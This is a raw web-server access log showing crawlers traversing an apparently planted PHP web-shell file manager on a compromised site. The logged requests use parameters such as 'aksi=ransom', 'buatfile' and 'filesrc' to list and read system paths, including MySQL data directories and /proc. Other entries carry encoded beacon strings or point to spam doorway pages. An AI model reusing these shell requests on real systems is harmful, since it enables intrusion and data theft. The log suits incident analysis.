20.171.207.239 - - [17/Jun/2025:09:10:53 -0400] "GET /?path=%2F%2Fproc%2Firq%2F24 HTTP/1.1" 200 2710 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
23.21.225.190 - - [17/Jun/2025:09:10:56 -0400] "GET /?path=//var/lib/mysql/raykeiym_2025 HTTP/1.1" 200 20187 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.106 - - [17/Jun/2025:09:11:01 -0400] "GET /?filesrc=%2F%2Fusr%2Flib%2Fnode_modules%2Fnpm%2Fman%2Fman1%2Fxzdiff.1.gz&path=%2F%2Fusr%2Flib%2Fnode_modules%2Fnpm%2Fman%2Fman1 HTTP/1.1" 301 2774 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.6.97.88 - - [17/Jun/2025:09:11:00 -0400] "GET /?path=//usr/share/locale/ro_RO HTTP/1.1" 200 20444 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.165 - - [17/Jun/2025:09:11:03 -0400] "GET /worker039047098.html?path=%2F HTTP/1.1" 200 2738 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:11:03 -0400] "GET /?filesrc=%2F%2Flib64%2Fpython2.7%2Ffileinput.pyc&path=%2F%2Flib64%2Fpython2.7 HTTP/1.1" 200 7319 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
18.215.112.101 - - [17/Jun/2025:09:11:04 -0400] "GET /?path=//opt/alt/tests/alt-php81-pecl-luasandbox_4.1.2-2.el8 HTTP/1.1" 200 20478 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.239 - - [17/Jun/2025:09:11:06 -0400] "GET /?path=%2F%2Fproc%2Firq%2F29 HTTP/1.1" 200 2714 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:11:17 -0400] "GET /?filesrc=%2F%2Flib64%2Fpython2.7%2Ffileinput.pyo&path=%2F%2Flib64%2Fpython2.7 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:11:17 -0400] "GET /?path=%2F%2Fproc%2Firq%2F32 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
98.84.60.17 - - [17/Jun/2025:09:11:16 -0400] "GET /?filesrc=//lib/firewalld/services/dhcp.xml&path=//lib/firewalld/services HTTP/1.1" 200 20241 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.165 - - [17/Jun/2025:09:11:18 -0400] "GET /sector155023668.html?path=%2F HTTP/1.1" 200 2738 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:11:27 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3p%2Fposix_trace_getnext_event.3p.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3p HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:11:29 -0400] "GET /?filesrc=%2F%2Flib64%2Fpython2.7%2Fpy_compile.pyo&path=%2F%2Flib64%2Fpython2.7 HTTP/1.1" 200 4948 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.165 - - [17/Jun/2025:09:11:31 -0400] "GET /product/pitch217?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fheader-footer-code-manager%2Fincludes HTTP/1.1" 301 2564 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
162.0.232.193 - - [17/Jun/2025:09:09:53 -0400] "GET /522314/522314/522314/index.php?ARRAY=7o2230223n313735303136393336312p2231223n22687474703n5p2s5p2s7n7331393176313379612r63616p776973652r626s6174735p2s3s6p633q7068705s636s64655s6n6326743q313735303136353736312q3239336162656433623261383066633262383730376366326430623237646535222p2232223n226632663636663265636461663061663634386464633866633363363830316337222p2233223n226630633834306462643437326464376133373338326237636638383235333233222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34362q35392q36372q38302q38382q3232227q HTTP/1.1" 200 0 "-" "-"
20.171.207.165 - - [17/Jun/2025:09:11:32 -0400] "GET / HTTP/1.1" 200 3715 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.203.152.231 - - [17/Jun/2025:09:11:32 -0400] "GET /?path=//var/softaculous/chevereto/php81 HTTP/1.1" 200 20591 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.239 - - [17/Jun/2025:09:11:36 -0400] "GET /?aksi=ransom&path=%2F%2Fproc%2Fself%2Froot%2Fopt%2Falt%2Ftests%2Falt-php80-pecl-mongodb_1.18.1-1.el8 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.165 - - [17/Jun/2025:09:11:42 -0400] "GET /product/suffer267?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fwp-rocket%2Finc%2FAPI HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:11:41 -0400] "GET /?filesrc=%2F%2Flib64%2Fpython2.7%2Fposixfile.pyc&path=%2F%2Flib64%2Fpython2.7 HTTP/1.1" 200 5275 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:11:45 -0400] "GET /?aksi=ransom&path=%2F%2Fproc%2Fself%2Froot%2Fopt%2Falt%2Ftests%2Falt-php83-pecl-mongodb_1.18.1-1.el8 HTTP/1.1" 200 2483 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.225 - - [17/Jun/2025:09:11:46 -0400] "GET /ulcerous/product/fjy13950636.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Frobots.txt&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com HTTP/1.1" 200 2082 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
162.0.232.193 - - [17/Jun/2025:09:10:13 -0400] "GET /522314/522314/522314/index.php?ARRAY=7o2230223n313735303136393431332p2231223n22687474703n5p2s5p2s7n7331393176313379612r63616p776973652r626s6174735p2s3s6p633q7068705s636s64655s6n6326743q313735303136353831332q3662363531366438636434316631643531623866313839363236616630356635222p2232223n226632663636663265636461663061663634386464633866633363363830316337222p2233223n226630633834306462643437326464376133373338326237636638383235333233222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34362q35392q36372q38302q38382q3232227q HTTP/1.1" 200 0 "-" "-"
50.16.248.61 - - [17/Jun/2025:09:11:48 -0400] "GET /?aksi=buatfile&path=//lib/locale/en_IN HTTP/1.1" 200 20962 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.239 - - [17/Jun/2025:09:11:50 -0400] "GET /?filesrc=%2F%2Flib64%2Fpython2.7%2Flinecache.pyc&path=%2F%2Flib64%2Fpython2.7 HTTP/1.1" 200 3799 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.225 - - [17/Jun/2025:09:11:49 -0400] "GET /catadromous/co/1462346822.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2F522314 HTTP/1.1" 200 2622 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.239 - - [17/Jun/2025:09:11:53 -0400] "GET /?aksi=buatfolder&path=%2F%2Fproc%2Fself%2Froot%2Fopt%2Falt%2Ftests%2Falt-php83-pecl-mongodb_1.18.1-1.el8 HTTP/1.1" 200 2121 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.165 - - [17/Jun/2025:09:11:52 -0400] "GET /palladian/goodscode/mg271758.shtml HTTP/1.1" 200 3691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.225 - - [17/Jun/2025:09:11:55 -0400] "GET /gloated/item/noi/1462149008.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Ff5462e HTTP/1.1" 200 2537 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
100.29.128.75 - - [17/Jun/2025:09:11:52 -0400] "GET /?aksi=buatfile&path=//lib/locale/en_IN HTTP/1.1" 200 20941 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.165 - - [17/Jun/2025:09:12:01 -0400] "GET /product/suffer267?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fthemes%2Ftwentytwentyone%2Ftemplate-parts%2Fpost HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.225 - - [17/Jun/2025:09:11:59 -0400] "GET /proximum/1456377676.shtml?path=%2Fhome HTTP/1.1" 200 2380 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.239 - - [17/Jun/2025:09:12:00 -0400] "GET /?filesrc=%2F%2Flib64%2Fpython2.7%2Fposixpath.pyo&path=%2F%2Flib64%2Fpython2.7 HTTP/1.1" 200 7083 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:11:59 -0400] "GET /?aksi=buatfolder&path=%2F%2Fproc%2Fself%2Froot%2Fopt%2Falt%2Ftests%2Falt-php80-pecl-mongodb_1.18.1-1.el8 HTTP/1.1" 200 2121 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.225 - - [17/Jun/2025:09:12:02 -0400] "GET /mississippian1459981694.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Ff5462e HTTP/1.1" 200 2537 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.225 - - [17/Jun/2025:09:12:05 -0400] "GET /reticulated/1455472266.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
35.173.18.61 - - [17/Jun/2025:09:12:04 -0400] "GET /?filesrc=//lib/firmware/cirrus/cs35l41-dsp1-spk-prot-10431e02.wmfw&path=//lib/firmware/cirrus HTTP/1.1" 200 37691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.239 - - [17/Jun/2025:09:12:06 -0400] "GET /?aksi=buatfile&path=%2F%2Fproc%2Fself%2Froot%2Fopt%2Falt%2Ftests%2Falt-php80-pecl-mongodb_1.18.1-1.el8 HTTP/1.1" 200 2483 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.225 - - [17/Jun/2025:09:12:06 -0400] "GET /parishional/goodscode/sy519531218.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fcgi-bin HTTP/1.1" 200 2421 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.225 - - [17/Jun/2025:09:12:08 -0400] "GET /sterlet1092783406.shtml?path=%2Fhome HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.239 - - [17/Jun/2025:09:12:08 -0400] "GET /?filesrc=%2F%2Flib64%2Fpython2.7%2Fcookielib.pyo&path=%2F%2Flib64%2Fpython2.7 HTTP/1.1" 200 22568 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.165 - - [17/Jun/2025:09:12:09 -0400] "GET /product/police43?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fthemes%2Ftoivo-lite%2Ffonts%2Fgenericons%2Fsource HTTP/1.1" 500 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.225 - - [17/Jun/2025:09:12:09 -0400] "GET /confounder1458426536.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2F.well-known HTTP/1.1" 200 2579 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.225 - - [17/Jun/2025:09:12:10 -0400] "GET /raver/uck/1092857438.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.239 - - [17/Jun/2025:09:12:10 -0400] "GET /?aksi=buatfile&path=%2F%2Fproc%2Fself%2Froot%2Fopt%2Falt%2Ftests%2Falt-php83-pecl-mongodb_1.18.1-1.el8 HTTP/1.1" 200 2483 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.225 - - [17/Jun/2025:09:12:11 -0400] "GET /matin1456421632.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com HTTP/1.1" 200 3265 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
162.0.232.193 - - [17/Jun/2025:09:10:33 -0400] "GET /522314/522314/522314/index.php?ARRAY=7o2230223n313735303136393433332p2231223n22687474703n5p2s5p2s7n7331393176313379612r63616p776973652r626s6174735p2s3s6p633q7068705s636s64655s6n6326743q313735303136353833332q6234343131613337613165663336363063396633363438616336346238343433222p2232223n226632663636663265636461663061663634386464633866633363363830316337222p2233223n226630633834306462643437326464376133373338326237636638383235333233222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34362q35392q36372q38302q38382q3232227q HTTP/1.1" 200 0 "-" "-"
50.16.216.166 - - [17/Jun/2025:09:12:12 -0400] "GET /?filesrc=//lib/locale/en_HK/LC_CTYPE&path=//lib/locale/en_HK HTTP/1.1" 200 51363 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.239 - - [17/Jun/2025:09:12:15 -0400] "GET /?filesrc=%2F%2Flib64%2Fpython3.6%2Fstatistics.py&path=%2F%2Flib64%2Fpython3.6 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:12:15 -0400] "GET /?aksi=ransom&path=%2F%2Fproc%2Firq%2F25 HTTP/1.1" 301 2697 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.165 - - [17/Jun/2025:09:12:17 -0400] "GET /product/elegant102?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fthemes%2Ftwentynineteen%2Fsass%2Fvariables-site HTTP/1.1" 200 2843 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.198.33.233 - - [17/Jun/2025:09:12:16 -0400] "GET /?path=//var/lib/mysql/oapwhxkz_wp522 HTTP/1.1" 200 20186 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.239 - - [17/Jun/2025:09:12:20 -0400] "GET /?aksi=buatfolder&path=%2F%2Fproc%2Firq%2F25 HTTP/1.1" 200 2048 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:12:21 -0400] "GET /?filesrc=%2F%2Flib64%2Fpython2.7%2Fposixfile.pyo&path=%2F%2Flib64%2Fpython2.7 HTTP/1.1" 200 5276 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
44.221.180.179 - - [17/Jun/2025:09:12:20 -0400] "GET /?aksi=buatfile&path=//lib/rpm/fileattrs HTTP/1.1" 200 20721 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.239 - - [17/Jun/2025:09:12:24 -0400] "GET /?aksi=buatfolder&path=%2F%2Fproc%2Firq%2F29 HTTP/1.1" 200 2048 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:12:26 -0400] "GET /?filesrc=%2F%2Flib64%2Fpython2.7%2Fpy_compile.pyc&path=%2F%2Flib64%2Fpython2.7 HTTP/1.1" 301 4961 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.194.14.255 - - [17/Jun/2025:09:12:28 -0400] "GET /?filesrc=//lib/firmware/cirrus/cs35l41-dsp1-spk-prot-10280cc3-spkid1.bin&path=//lib/firmware/cirrus HTTP/1.1" 500 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.239 - - [17/Jun/2025:09:12:27 -0400] "GET /?aksi=buatfolder&path=%2F%2Fproc%2Firq%2F24 HTTP/1.1" 200 2048 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:12:31 -0400] "GET /?aksi=buatfile&path=%2F%2Fproc%2Firq%2F25 HTTP/1.1" 200 2724 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
162.0.232.193 - - [17/Jun/2025:09:10:54 -0400] "GET /522314/522314/522314/index.php?ARRAY=7o2230223n313735303136393435342p2231223n22687474703n5p2s5p2s7n7331393176313379612r63616p776973652r626s6174735p2s3s6p633q7068705s636s64655s6n6326743q313735303136353835342q3061383839626333636138333937376562613934386238323930356535633333222p2232223n226632663636663265636461663061663634386464633866633363363830316337222p2233223n226630633834306462643437326464376133373338326237636638383235333233222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34362q35392q36372q38302q38382q3232227q HTTP/1.1" 200 0 "-" "-"
20.171.207.239 - - [17/Jun/2025:09:12:32 -0400] "GET /?filesrc=%2F%2Flib64%2Fpython2.7%2Ffractions.pyo&path=%2F%2Flib64%2Fpython2.7 HTTP/1.1" 200 9069 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:12:34 -0400] "GET /?aksi=buatfile&path=%2F%2Fproc%2Firq%2F24 HTTP/1.1" 200 2710 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
23.23.213.182 - - [17/Jun/2025:09:12:36 -0400] "GET /?filesrc=//lib/locale/en_ZA/LC_CTYPE&path=//lib/locale/en_ZA HTTP/1.1" 200 51383 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.239 - - [17/Jun/2025:09:12:37 -0400] "GET /?aksi=buatfile&path=%2F%2Fproc%2Firq%2F29 HTTP/1.1" 301 2697 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.210.155.69 - - [17/Jun/2025:09:12:40 -0400] "GET /?filesrc=//lib/firmware/ueagle-atm/CMVep.bin&path=//lib/firmware/ueagle-atm HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.239 - - [17/Jun/2025:09:12:37 -0400] "GET /?filesrc=%2F%2Flib64%2Fpython2.7%2Fcontextlib.py&path=%2F%2Flib64%2Fpython2.7 HTTP/1.1" 200 3525 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:12:40 -0400] "GET /?aksi=ransom&path=%2F%2Fproc%2Firq%2F24 HTTP/1.1" 301 2686 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.165 - - [17/Jun/2025:09:12:40 -0400] "GET /product/collect238?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fthemes%2Ftwentynineteen%2Fsass%2Fvariables-site HTTP/1.1" 200 2843 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:12:42 -0400] "GET /?filesrc=%2F%2Flib64%2Fpython2.7%2Ffractions.pyc&path=%2F%2Flib64%2Fpython2.7 HTTP/1.1" 200 9070 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.225 - - [17/Jun/2025:09:12:43 -0400] "GET /alchemilla/entity/ndg1410526656.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fcgi-bin HTTP/1.1" 301 2421 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.225 - - [17/Jun/2025:09:12:46 -0400] "GET /metantimonic/items/grq1092991422.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2F522314 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.239 - - [17/Jun/2025:09:12:44 -0400] "GET /?aksi=ransom&path=%2F%2Fproc%2Firq%2F29 HTTP/1.1" 200 2714 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:12:47 -0400] "GET /?filesrc=%2F%2Flib64%2Fpython2.7%2Fposixpath.pyc&path=%2F%2Flib64%2Fpython2.7 HTTP/1.1" 200 7083 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.225 - - [17/Jun/2025:09:12:47 -0400] "GET /saurioid/items/rha1461972096.shtml?path=%2Fhome HTTP/1.1" 301 2380 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.239 - - [17/Jun/2025:09:12:48 -0400] "GET /?filesrc=%2F%2Fproc%2Firq%2F24%2Feffective_affinity_list&path=%2F%2Fproc%2Firq%2F24 HTTP/1.1" 200 1995 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:12:51 -0400] "GET /?filesrc=%2F%2Fproc%2Firq%2F29%2Feffective_affinity_list&path=%2F%2Fproc%2Firq%2F29 HTTP/1.1" 500 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.225 - - [17/Jun/2025:09:12:50 -0400] "GET /oakum/xq1461962440.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2F522314 HTTP/1.1" 200 2622 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.239 - - [17/Jun/2025:09:12:52 -0400] "GET /?filesrc=%2F%2Flib64%2Fpython3.6%2Fcompileall.py&path=%2F%2Flib64%2Fpython3.6 HTTP/1.1" 200 5527 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
23.21.204.95 - - [17/Jun/2025:09:12:48 -0400] "GET /?filesrc=//lib/firmware/brcm/brcmfmac43430-sdio.MUR1DX.txt&path=//lib/firmware/brcm HTTP/1.1" 200 20616 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.225 - - [17/Jun/2025:09:12:53 -0400] "GET /inorganically/su1459220510.shtml?path=%2Fhome%2Fhonehdyv HTTP/1.1" 200 4455 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
162.0.232.193 - - [17/Jun/2025:09:11:15 -0400] "GET /522314/522314/522314/index.php?ARRAY=7o2230223n313735303136393437352p2231223n22687474703n5p2s5p2s7n7331393176313379612r63616p776973652r626s6174735p2s3s6p633q7068705s636s64655s6n6326743q313735303136353837352q3965616338383238346166653030623262343535623265323162636131343362222p2232223n226632663636663265636461663061663634386464633866633363363830316337222p2233223n226630633834306462643437326464376133373338326237636638383235333233222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34362q35392q36372q38302q38382q3232227q HTTP/1.1" 200 0 "-" "-"
20.171.207.239 - - [17/Jun/2025:09:12:54 -0400] "GET /?filesrc=%2F%2Fproc%2Firq%2F25%2Feffective_affinity_list&path=%2F%2Fproc%2Firq%2F25 HTTP/1.1" 200 1995 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
